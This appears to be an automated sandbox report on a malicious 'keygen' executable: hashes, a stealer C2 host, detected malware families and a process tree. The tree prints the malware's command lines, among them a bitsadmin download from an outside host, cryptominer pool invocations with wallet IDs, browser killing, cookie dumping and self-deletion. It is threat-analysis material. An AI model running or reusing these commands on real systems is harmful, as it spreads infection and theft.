Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-04-2021 13:09

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2692
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2788
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2396
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1960
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1424
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1248
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1240
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1092
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1040
                    • C:\Users\Admin\AppData\Roaming\dvsegwg
                      C:\Users\Admin\AppData\Roaming\dvsegwg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3932
                      • C:\Users\Admin\AppData\Roaming\dvsegwg
                        C:\Users\Admin\AppData\Roaming\dvsegwg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5088
                    • C:\Users\Admin\AppData\Roaming\whsegwg
                      C:\Users\Admin\AppData\Roaming\whsegwg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2056
                    • C:\Users\Admin\AppData\Roaming\dvsegwg
                      C:\Users\Admin\AppData\Roaming\dvsegwg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5908
                      • C:\Users\Admin\AppData\Roaming\dvsegwg
                        C:\Users\Admin\AppData\Roaming\dvsegwg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4680
                    • C:\Users\Admin\AppData\Roaming\whsegwg
                      C:\Users\Admin\AppData\Roaming\whsegwg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1212
                    • C:\Users\Admin\AppData\Roaming\dvsegwg
                      C:\Users\Admin\AppData\Roaming\dvsegwg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3368
                      • C:\Users\Admin\AppData\Roaming\dvsegwg
                        C:\Users\Admin\AppData\Roaming\dvsegwg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5556
                    • C:\Users\Admin\AppData\Roaming\whsegwg
                      C:\Users\Admin\AppData\Roaming\whsegwg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5260
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:340
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:812
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3328
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:184
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2276
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2700
                        • C:\Users\Admin\AppData\Local\Temp\is-NOLDH.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-NOLDH.tmp\Install.tmp" /SL5="$501DE,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2124
                          • C:\Users\Admin\AppData\Local\Temp\is-1RTO4.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-1RTO4.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2076
                            • C:\Program Files\Java\ZGSCYGJGJM\ultramediaburner.exe
                              "C:\Program Files\Java\ZGSCYGJGJM\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1284
                              • C:\Users\Admin\AppData\Local\Temp\is-OURMR.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-OURMR.tmp\ultramediaburner.tmp" /SL5="$3010E,281924,62464,C:\Program Files\Java\ZGSCYGJGJM\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:2368
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3908
                            • C:\Users\Admin\AppData\Local\Temp\06-3a433-7dd-a2484-6e939f7db40ae\ZHaelaehaewudae.exe
                              "C:\Users\Admin\AppData\Local\Temp\06-3a433-7dd-a2484-6e939f7db40ae\ZHaelaehaewudae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:1012
                            • C:\Users\Admin\AppData\Local\Temp\48-9861c-bd5-359a7-f0b9e1cde5257\Gepoxyzhyku.exe
                              "C:\Users\Admin\AppData\Local\Temp\48-9861c-bd5-359a7-f0b9e1cde5257\Gepoxyzhyku.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:1276
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zmzct4h1.qm4\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4808
                                • C:\Users\Admin\AppData\Local\Temp\zmzct4h1.qm4\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\zmzct4h1.qm4\instEU.exe
                                  7⤵
                                    PID:4944
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1w34ejar.d3x\google-game.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4936
                                  • C:\Users\Admin\AppData\Local\Temp\1w34ejar.d3x\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\1w34ejar.d3x\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5116
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      PID:752
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ly1iblcu.x4p\md1_1eaf.exe & exit
                                  6⤵
                                    PID:4068
                                    • C:\Users\Admin\AppData\Local\Temp\ly1iblcu.x4p\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\ly1iblcu.x4p\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:2232
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\upy1hanq.e4z\askinstall39.exe & exit
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4944
                                    • C:\Users\Admin\AppData\Local\Temp\upy1hanq.e4z\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\upy1hanq.e4z\askinstall39.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4520
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        8⤵
                                          PID:4292
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            9⤵
                                            • Kills process with taskkill
                                            PID:4940
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qtnj54f5.tld\y1.exe & exit
                                      6⤵
                                        PID:4400
                                        • C:\Users\Admin\AppData\Local\Temp\qtnj54f5.tld\y1.exe
                                          C:\Users\Admin\AppData\Local\Temp\qtnj54f5.tld\y1.exe
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5220
                                          • C:\Users\Admin\AppData\Local\Temp\hSWXRzSiHp.exe
                                            "C:\Users\Admin\AppData\Local\Temp\hSWXRzSiHp.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            PID:5124
                                            • C:\Users\Admin\AppData\Roaming\1619450056184.exe
                                              "C:\Users\Admin\AppData\Roaming\1619450056184.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619450056184.txt"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:5148
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\hSWXRzSiHp.exe"
                                              9⤵
                                                PID:3172
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 3
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:5860
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\qtnj54f5.tld\y1.exe"
                                              8⤵
                                                PID:2384
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:5344
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ozhontfo.rdq\SunLabsPlayer.exe /S & exit
                                            6⤵
                                              PID:5264
                                              • C:\Users\Admin\AppData\Local\Temp\ozhontfo.rdq\SunLabsPlayer.exe
                                                C:\Users\Admin\AppData\Local\Temp\ozhontfo.rdq\SunLabsPlayer.exe /S
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                PID:5624
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:5348
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:5520
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5592
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4464
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5892
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5748
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                            8⤵
                                                            • Checks for any installed AV software in registry
                                                            PID:2220
                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                            8⤵
                                                            • Download via BitsAdmin
                                                            PID:5784
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -piXr3DMrthC8Tws4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:5952
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peMb4BpZVBNLXLM1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5752
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:4548
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5884
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5456
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4856
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Blocklisted process makes network request
                                                                    PID:4760
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SBmmuMEA\SBmmuMEA.dll" SBmmuMEA
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:4624
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SBmmuMEA\SBmmuMEA.dll" SBmmuMEA
                                                                      9⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in System32 directory
                                                                      PID:4796
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:4220
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:6104
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:1908
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5960
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa1FFE.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4116
                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:2384
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qj5ecl1e.xwm\inst.exe & exit
                                                                      6⤵
                                                                        PID:5432
                                                                        • C:\Users\Admin\AppData\Local\Temp\qj5ecl1e.xwm\inst.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\qj5ecl1e.xwm\inst.exe
                                                                          7⤵
                                                                            PID:5748
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u4exdqcb.4ub\GcleanerWW.exe /mixone & exit
                                                                          6⤵
                                                                            PID:5576
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\grufvqjn.pna\toolspab1.exe & exit
                                                                            6⤵
                                                                              PID:5784
                                                                              • C:\Users\Admin\AppData\Local\Temp\grufvqjn.pna\toolspab1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\grufvqjn.pna\toolspab1.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:4920
                                                                                • C:\Users\Admin\AppData\Local\Temp\grufvqjn.pna\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\grufvqjn.pna\toolspab1.exe
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5448
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ex0mvhiz.ac4\app.exe /8-2222 & exit
                                                                              6⤵
                                                                                PID:6028
                                                                                • C:\Users\Admin\AppData\Local\Temp\ex0mvhiz.ac4\app.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\ex0mvhiz.ac4\app.exe /8-2222
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5204
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ex0mvhiz.ac4\app.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\ex0mvhiz.ac4\app.exe" /8-2222
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:4296
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zn2x1xm3.ds3\c7ae36fa.exe & exit
                                                                                6⤵
                                                                                  PID:5192
                                                                                  • C:\Users\Admin\AppData\Local\Temp\zn2x1xm3.ds3\c7ae36fa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\zn2x1xm3.ds3\c7ae36fa.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:5768
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies system certificate store
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4180
                                                                          • C:\Users\Admin\AppData\Roaming\D97D.tmp.exe
                                                                            "C:\Users\Admin\AppData\Roaming\D97D.tmp.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4204
                                                                            • C:\Users\Admin\AppData\Roaming\D97D.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\D97D.tmp.exe"
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Checks processor information in registry
                                                                              PID:4960
                                                                          • C:\Users\Admin\AppData\Roaming\DC4D.tmp.exe
                                                                            "C:\Users\Admin\AppData\Roaming\DC4D.tmp.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4672
                                                                            • C:\Windows\system32\msiexec.exe
                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w14815@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                              4⤵
                                                                                PID:4476
                                                                              • C:\Windows\system32\msiexec.exe
                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w11910 --cpu-max-threads-hint 50 -r 9999
                                                                                4⤵
                                                                                • Blocklisted process makes network request
                                                                                PID:4860
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                              3⤵
                                                                                PID:4148
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:2700
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Checks whether UAC is enabled
                                                                              PID:5336
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              PID:5552
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:5816
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:6080
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:5464
